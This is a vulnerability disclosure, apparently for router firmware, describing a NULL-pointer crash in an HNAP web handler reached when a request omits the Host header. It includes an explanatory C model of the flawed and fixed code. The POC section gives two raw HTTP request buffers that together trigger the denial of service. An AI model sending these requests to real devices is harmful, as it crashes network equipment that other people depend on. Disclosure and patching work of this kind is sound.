Overview

Vulnerability Details


The function sub_4110f4() is registered to handle requests for unknown URLs. If the URL contains any of the extensions ".html", ".asp", ".php" or ".Login", and v18 is non-zero (a value we can control by sending a /HNAP1/SetIgnoreWizardConfig request), execution reaches the vulnerable branch. That branch passes a1[330] to strstr(). a1[330] holds the value of the Host request header, so it is NULL whenever the request carries no Host header. Passing a NULL pointer to strstr() causes the server to crash unexpectedly.

This allows an authorized attacker to perform a DoS attack.
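The following C model is an added example, not code from the firmware or from this writeup. It reconstructs the pattern described above (a handler that calls strstr() on the Host field of a parsed request without checking it for NULL) beside a hardened version that rejects the request when the header is absent. The request layout, the field index 330, the v18 stand-in `ignore_wizard`, and the EXPECTED_HOST needle are all assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical request layout: an array of parsed header/field pointers,
 * with the Host header stored at index 330 as the writeup describes, plus
 * a flag standing in for v18 (set by SetIgnoreWizardConfig). */
#define NFIELDS    512
#define HOST_FIELD 330
#define EXPECTED_HOST "router.example.local"   /* assumed needle for strstr() */

typedef struct {
    const char *field[NFIELDS];   /* field[HOST_FIELD] is NULL when no Host header was sent */
    int ignore_wizard;            /* stands in for v18 */
} request_t;

/* Builds a request with the given Host value (NULL = header omitted). */
request_t make_request(int ignore_wizard, const char *host) {
    request_t r;
    memset(&r, 0, sizeof r);
    r.ignore_wizard = ignore_wizard;
    r.field[HOST_FIELD] = host;
    return r;
}

/* "Contains" check matching the writeup's extension list. */
static int has_page_extension(const char *url) {
    static const char *exts[] = { ".html", ".asp", ".php", ".Login" };
    for (size_t i = 0; i < sizeof exts / sizeof exts[0]; i++)
        if (strstr(url, exts[i]) != NULL)
            return 1;
    return 0;
}

/* Vulnerable pattern: strstr() on the Host field with no NULL check.
 * Returns 1 if the host matches, 0 otherwise; undefined behaviour (a crash
 * on this target) when the Host header is missing and the branch is taken. */
int handle_unknown_url_vuln(const request_t *req, const char *url) {
    if (has_page_extension(url) && req->ignore_wizard != 0)
        return strstr(req->field[HOST_FIELD], EXPECTED_HOST) != NULL;
    return 0;
}

/* Hardened version: a request that reaches the Host-dependent branch without
 * a Host header is rejected (-1, i.e. answer 400 Bad Request) instead of
 * being dereferenced. Every other path behaves exactly as before. */
int handle_unknown_url_fixed(const request_t *req, const char *url) {
    if (url == NULL)
        return -1;
    if (has_page_extension(url) && req->ignore_wizard != 0) {
        const char *host = req->field[HOST_FIELD];
        if (host == NULL)
            return -1;                /* missing Host: reject, do not crash */
        return strstr(host, EXPECTED_HOST) != NULL;
    }
    return 0;
}
```

The fix is the single NULL check; the same check belongs in front of every other place that consumes an optional header, because the server cannot rely on clients to send one.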

POC

buf1 = b'POST /HNAP1/ HTTP/1.1\r\nCookie: hasLogin=1;\r\nContent-Length: 312\r\nHNAP_AUTH: 182013CCC23251CDE1336D3AE3FF3ECD 1706003719\r\nSOAPAction: "http://purenetworks.com/HNAP1/SetIgnoreWizardConfig"\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetIgnoreWizardConfig xmlns="http://purenetworks.com/HNAP1/" /></soap:Body></soap:Envelope>\r\n'

buf2 = b'GET /crash.html HTTP/1.1\r\n\r\n'
